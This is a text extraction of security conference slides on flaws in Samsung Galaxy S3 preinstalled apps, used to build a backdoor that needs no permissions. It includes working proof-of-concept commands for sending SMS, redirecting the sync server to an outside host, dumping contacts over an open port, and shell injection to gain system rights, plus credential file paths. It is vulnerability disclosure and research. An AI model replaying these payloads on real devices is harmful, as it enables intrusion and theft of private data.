)security and backdoors without permissionsh4ka.fr/Android_OEM_applications_insecurity_and...Android introduction Android security model Methodology Toward a backdoor without permission

Android OEM’s applications (in)security andbackdoors without permission

André [email protected]

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation

Plan

1 Context and objectives

2 Android introduction

3 Android security model

4 Methodology

5 Toward a backdoor without permission

6 Post-exploitation

7 Scope of the vulnerabilities

8 Conclusion

http://www.quarkslab.com

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Context and objectives

Why Android?

Most used mobile OS

Security often questioned because of many malwares

Unofficial markets (warez)

Show off how an application without any permission can takecontrol of a smartphone


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Context and objectives

Targeted user

Security aware user

Doesn’t use alternative marketsChecks permissions before installing an application

Targeted smartphone

Samsung Galaxy S3 (I9300)

50 millions copies sold (March 2013)

Actually, the Samsung overlay on the I9300

Some of these applications may also be present on other modelsSome vulnerabilities may impact other models (S2, S4, Note 1/2, ...)The vulnerable applications can’t be deleted without root access


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Plan




4 Methodology


6 Post-exploitation


8 Conclusion


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Plan


2 Android introductionAndroid system and the applicationsClassical components of an Android applicationThe communication between componentsThe exposition of components


4 Methodology


6 Post-exploitation


8 Conclusion


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Android system and the applications

The Android system

Generalities and common knowledge

Mobile OS (smartphone/tablet) ”open source”

Based on Linux

Developed in C and Java

A special virtual machine: DalvikVM

Dalvik Bytecode (DEX/ODEX)

What is an Android application ?

APK file (actually a ZIP file)

APK’s most important files:

AndroidManifest.xml (configuration, permissions, components, ...)classes.dex (executable bytecode)Native libraries as .so files (JNI)

Each application has an unique name (packagename) and is signedby his developper (certificate)


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Classical components of an Android application

The applicative components


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


The communication between components

The Intent: source of communication in Android


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


The exposition of components

Can we talk to this component?

exported or not, that’s the question

By default, components are not exported

Special case: ContentProvider

The component status, exported or not, is defined byAndroidManifest.xml

The attribute exported=[true|false]Presence of an intent-filter (the component is automaticallyexported)

A component can be exported but protected by a permission


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


The exposition of components

Example of AndroidManifest.xml

1 2 4 5 6 7 9

10 11 12 13 14 15 16 17 18 19 20 21 22


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Plan



3 Android security modelApplications isolationThe permission system

4 Methodology


6 Post-exploitation


8 Conclusion


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Applications isolation

One user per application

Security by isolation

Default behaviour:

Each application has a dedicated user (and therefore an UID) on thesystem

Special case:

An application can ask to share an UID with another applicationsharedUserId mechanism (AndroidManifest.xml)In order to share an UID, 2 applications must be signed with thesame certificate

Consequences

Isolation between application in memory (process)

Isolation on the filesystem

Don’t protect against world readable/writeable files


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


The permission system

Application restrictions

Least privilege security

Permission to protect against dangerous actions:

SD card write access, INTERNET access, sending SMS, ...

By default, an application doesn’t have any permission

You need to ask for them explicitly in AndroidManifest.xml

Asked permissions are shown to the user at installationBoolean choice

A permission can protect:

Functions: AccountManager.getAccounts() (GET_ACCOUNTS)Intents: android.intent.action.CALL (CALL_PHONE)Components: content://contacts (READ_CONTACTS, ...)

A permission is given to an UID and not to a packagename

Permission model is applied on native code tooAll permissions of each application with the same sharedUserId arecombined


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


The permission system

Application restrictions

Consequences of the permission model

Components can be protected

The user ”knows”what the application can do when it is installed,thus the associated risks

Limit the impact in case of vulnerable application


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Plan




4 MethodologyA huge surface attackVulnerability research


6 Post-exploitation


8 Conclusion


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


A huge surface attack

The attack surface

Important folders

We want to do a backdoor targeting an Android smartphone

Userland vulnerabilities (easy to find, easy to exploit)

Folders customized by constructors on an Android smartphone:

/system/app/system/framework/system/bin/system/lib

The content of these folders may change between operators


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




A large number of applications

Only two folders examined, but a consequent attack surface

216 APK in /system/app

To compare: 91 APK for the Nexus 4


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Vulnerability research

Automation

Constraints

Many application, need automation to find interesting applications

Then audit by hand (reverse engineering)

Exploitation of vulnerabilities with a little amount or no permissionat all

Creation of some scripts: ASA

Based on Androguard (great framework)

ASAManifest: Analyzes the manifest of an application and tellswhich components are exported and under what conditions

ASADatabase: Analyzes a large amount of applications likeASAManifest does and checks for sensitive API usage. The resultsare stored in MongoDB database.

ASADiff (ongoing): Diff between two versions of a system, byexample to detect vulnerability patching.


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



ASAManifest


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



ASADatabase: examples of queries on MongoDB

Applications with INSTALL PACKAGES permission

^Î^Î> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0})^Î^Î{ "filename" : "DttSupport.apk" }^Î^Î{ "filename" : "Kies.apk" }^Î^Î{ "filename" : "MtpApplication.apk" }^Î^Î{ "filename" : "PackageInstaller.apk" }^Î^Î[...]^Î^Î

Number of sharedUserId system applications

^Î^Î> db.gs3.find({"manifest.sharedUserId":"android.uid.system"},{}).count()^Î^Î41^Î^Î

Which one really use INSTALL PACKAGES ?

^Î^Î> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0}).count()^Î^Î11^Î^Î> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:true},^Î^Î{filename:1,_id:0}).count()^Î^Î10^Î^Î> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:false},^Î^Î{filename:1,_id:0})^Î^Î{ "filename" : "MtpApplication.apk" }^Î^Î


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Plan




4 Methodology

5 Toward a backdoor without permissionBackdoor’s featuresSD Card: Android and the retrocompatibility...SMS/MMS sending and files exfiltrationArbitrary HTTP requests executionGetting C.R.U.D rights on SMS/Contacts/Memo and moreSync for fun and profitI dont need root when i have system

6 Post-exploitation


8 Conclusion


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Backdoor’s features

Objectives


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


SD Card: Android and the retrocompatibility...

SD Card: a protected storage?

Once upon a time... Android

First versions: total access to the SD Card

read & write access

Current state

Write access: WRITE EXTERNAL STORAGE

Read access: currently ”tolerated”without permission

Dangerous for user privacy (internet + sdcard)Introduction of the READ EXTERNAL STORAGE permission”Protect the SD Card” in system parameters (JB)

And what about the retrocompatibility?

From the android documentation, if minSdkVersion andtargetSdkVersion

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


SD Card: Android and the retrocompatibility...

Objectives


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


SMS/MMS sending and files exfiltration

Vuln1 - SecMms.apk

The malwares and premium SMS

Current Android malwares ask for the SEND SMS permission

Easily detectable and suspect for an userWhat about a malware which can send premium SMS without askingfor permission?

There is an app for that

SecMms.apk

exported BroadcastReceiver -> ui.MmsBGSenderAn well formatted Intent allows to send arbitrary SMS/MMS

PoC (attachments can also be added)

shell@android:/ $ am broadcast -a com.android.mms.QUICKSND --es mms_to "*PHONENUMBER*"--es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"^^I^^I


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


SMS/MMS sending and files exfiltration

Objectives


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Arbitrary HTTP requests execution

Vuln2 - PCWClientS.apk

PCWReceiver

When an Intent is received withcom.sec.pcw.device.HTTP_REQUEST_RETRY as action

The body, uri and pushType attributed are extracted and anHTTP POST request is executed based on it

PoC

shell@android:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri*URL* --es body *POST_DATA* --es pushType *PUSHTYPE*^^I


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Arbitrary HTTP requests execution

Objectives


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Getting C.R.U.D rights on SMS/Contacts/Memo and more

Vuln3 - wssyncmlnps.apk

Typical problems with constructor overlay

This vulnerability was patched by Samsung before we reported it

Patched on the S3 but not on the S2, Tab 1, Note 1

Special case: INTERNET permission is needed

creation of a socket

smlNpsReceiver

The application exports a BroadcastReceiver smlNpsReceiver

Answers to Intent related to Kiescom.intent.action.KIES WSSERVICE STARTcom.intent.action.KIES WSSERVICE START WIFI


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




smlNpsReceiver

1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 [...]4 if(paramIntent.getAction().5 ^Îequals("com.intent.action.KIES_WSSERVICE_START"))6 {7 ^ÎsmlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");8 wifi_connected = false;9 ^Î usb_connected = true;

10 ^ÎparamContext.stopService(11 ^Î new Intent(paramContext, smlNpsService.class)12 ^Î);13 ^ÎparamContext.startService(14 ^Î new Intent(paramContext, smlNpsService.class)15 ^Î);16 }17 [...]18 }19 ^Î^Î


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




smlNpsService

When it starts, it runs NpsServiceTask in a thread

Listens on 0.0.0.0:1108 (TCP)

Each connection is handled by smlNpsHandler in a separated thread

The method work() is called to handle the received data


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




smlNpsHandler.work()

1 protected void work()2 {3 if(this.socket != 0)4 {5 socketIS = this.socket.getInputStream();6 socketOS = this.socket.getOutputStream();7 cmdLine = this.readLine(socketIS);8 if((cmdLine != 0) && (cmdLine.length() != 0))9 {

10 cmdInformation = new String[3];11 v5 = cmdLine.indexOf("BEGIN");12 cmdInformation[0] = cmdLine.substring(0, 3);13 if(v5

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.





1 case 70:2 v1 = this.GetContact(cmdInformation[1]);3 v2 = 0;4 break;5 [...]6 case 72:7 v1 = this.GetContactsIndexArray(8 ^Îcom.wssnps.database.smlContactItem$StorageType.

SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());9 v2 = 0;

10 break;11 [...]12 case 90:13 v1 = this.GetCalendar(cmdInformation[1]);14 v2 = 0;15 break;16 [...]17 ^Î^Î


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.





1 case 453:2 v1 = Integer.valueOf(cmdInformation[1].trim()).intValue();3 if(v1

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




PoC$ adb shell am broadcast -a com.intent.action.KIES_WSSERVICE_STARTBroadcasting: Intent { act=com.intent.action.KIES_WSSERVICE_START }Broadcast completed: result=0$ adb shell netstat |grep 1108tcp6 0 0 :::1108 :::* LISTEN$ adb forward tcp:1108 tcp:1108$ nc localhost 1108 -vConnection to localhost 1108 port [tcp/*] succeeded!

090 1 # getCalendar(1)0BEGIN:VCALENDARVERSION:1.0BEGIN:VEVENTSUMMARY;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Sstic 2013DESCRIPTION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:ConfLOCATION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:RennesDTSTART:20130605T170000ZDTEND:20130607T180000ZX-ALLDAY:UNSETX-CALENDARGROUP:1UID:000000000000000000000000000000000000000000000001END:VEVENTEND:VCALENDAR^Î^Î^Î


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




PoC072 # get the id of contacts on the smartphone (not the SIM)02 # number of contact8,9, # id of the contacts

070 9 # getContact(9)0BEGIN:VCARDVERSION:2.1N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Kevin;;;;;;;TEL;HOME;CELL:06 06 06 06 06EMAIL;HOME;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:[email protected]:1X-ACCOUNT:vnd.sec.contact.phone;vnd.sec.contact.phoneEND:VCARD

453 32 # install APK from /sdcard/restore/

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^Î^Î^Î

Some available features...

C.R.U.D on the SMS/MMS/contacts/memos/calendar/call log/...

Backup of mail accounts

Installation of arbitrary application


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




How it was patched?

Permission added on the component for the actionKIES_WSSERVICE_START

android.permission.COM_WSSNPS has a protectionLevel ofsignatureOrSystem


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



Objectives


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Sync for fun and profit

Vuln4 - Sync and remote control applications...

FmmDM, FmmDS, ...

There are applications to do data sync and remote control of thesmartphone

”Security”=> ”Remote controls”

The user can remote control his phone via http://samsungdive.com/


.................................

.......

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



Vuln4 - sync and remote control applications...

Vulnerabilities

These applications export a BroadcastReceiver

With the correct Intent, you can change the default server used forsync and remote control by the smartphone

Poc for FmmDM

shell@android:/ $ am broadcast -a android.intent.action.dsm.UPDATE_URL--es DMServer "http://sh4ka.fr:80/test/trololo.php"^^I


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



Vuln4 - sync and remote control applications...


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


I dont need root when i have system

Vuln5 - serviceModeApp.apk

ASADatabase to the rescue

Search in the database for applications with:

sharedUserId = system

Usage of API for command execution/dynamic code loading

Among these applications: serviceModeApp.apk

A strange AndroidManifest.xml file

1 2 3 4 5 6 8 9

10 11 12 ^^I


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




FTATDumpReceiver.onReceive()

1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 String str1 = paramIntent.getAction();4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);5 if (str1.equals("com.android.sec.FTAT_DUMP"))6 {7 String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");8 Calendar localCalendar = Calendar.getInstance();9 String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get

(1));10 ^Î[...]11 String str9 = str8 + new DecimalFormat("00").format(localCalendar.get

(13));12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);14 localIntent2.setFlags(268435456);15 localIntent2.putExtra("FILENAME", str9);16 paramContext.startService(localIntent2);17 }18 [...]19 }20 ^Î^Î


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




FTATDumpService.onStartCommand()

1 public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)2 {3 Log.i("FTATDumpService", "onStartCommand()");4 this.mHandler.sendEmptyMessage(1005);5 final String str = paramIntent.getStringExtra("FILENAME");6 [...]7 new Thread(new Runnable()8 {9 public void run()

10 {11 FTATDumpService.this.sendMessage(12 FTATDumpService.access$600(FTATDumpService.this),13 FTATDumpService.this.mHandler.obtainMessage(1014)14 );15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "

.log"))16 FTATDumpService.this.mHandler.sendEmptyMessage(1015);17 ^Î [...]18 }19 }).start();20 return 0;21 }22 ^Î^Î


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.





.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




FTATDumpService.doShellCmd()

1 private boolean DoShellCmd(String paramString)2 {3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramString);4 String[] arrayOfString = new String[3];5 arrayOfString[0] = "/system/bin/sh";6 arrayOfString[1] = "-c";7 arrayOfString[2] = paramString;8 Log.i("FTATDumpService", "exec␣command");9 Runtime.getRuntime().exec(arrayOfString).waitFor();

10 Log.i("FTATDumpService", "exec␣done");11 Log.i("FTATDumpService", "DoShellCmd␣done");12 return true;13 }14 ^^I^^I


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



Srsly?


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.




PoC

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP--es FILENAME ’../../../../../dev/null;/system/bin/id > /sdcard/shellescape;#’Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0$ adb shell cat /sdcard/shellescapeuid=1000(system) gid=1000(system) groups=1001(radio),1006(camera),1007(log),1015(sdcard_rw),1023(media_rw),1028(sdcard_r),2001(cache),3001(net_bt_admin),3002(net_bt),3003(inet),3007(net_bw_acct)^^I


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



Inventory of the permissions obtained

Inventory

Combination of all the permissions of sharedUserId=systemapplications

A total of 156 permissionsLike android.permission.INSTALL_PACKAGE (pm installpackage.apk)Like access to mail accounts, SMS, internet, ...

We can inject code inside other applications (dalvik-cache)

Sensitive informations can be read

Wifi keys: /data/misc/wifi/wpa supplicant.conf

Password/pincode/pattern: guesture.key, password.key, ...

Mail accounts and Google Account token:/data/system/user/X/accounts.db


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



Objectives


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Plan




4 Methodology


6 Post-exploitationSamsung MDM for fun and lazinessI can haz your sms?


8 Conclusion


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Samsung MDM for fun and laziness

The Samsung’s MDM : SAFE

Discovery of SAFE

SAmsung For Enterprise: A framework for Samsung models

Expose an API for the commercial MDMsUsed partly by SamsungDive

Implemented partly in /system/framework/services.odex

Study of the permission system

Many modules : BrowserPolicy, DevicePolicy, ...

Each module checks that the calling application has the correctpermission:

One permission per module : android.permission.sec.MDM_XXXEnforcement via enforceXXXPermission()

SAFE : The god mode

The framework doesn’t check the permission when the calling applicationis system (UID = 1000)


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Samsung MDM for fun and laziness

SAFE: The god mode

MDM Usage without any restriction

The features implemented (for us?):

Application Policy - application backup, application uninstall, ...Mail Account Policy - Manage mail accounts, behaviour whenSSL certificates are invalid, ...Enterprise VPN Policy - Retrieving of the certificates, passwords,...Phone Restriction - Block WiFi, VPN connection, USB Debug,OTA firmware updates, reset to factory settings, ...Misc Policy - Retrieve the clipboard content, ...

We can ”infect” someone and prevent him from receiving firmwareupdates that corrects vulnerabilities.


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


I can haz your sms?

SMS Forwarding

DSMLawmo.apk

Study of the applications listening for incomming SMS

BroadcastReceiver listening for Intent with actionandroid.provider.Telephony.SMS_RECEIVED

DSMLawmo.apk seems to have an interesting functionality...[...]if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction())){

Util.Logd("Start to SMS forwarding service");[...]^^I^^I


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

Android in

Documents

)security and backdoors without permissionsh4ka.fr/Android_OEM_applications_insecurity_and...Android introduction Android security model Methodology Toward a backdoor without permission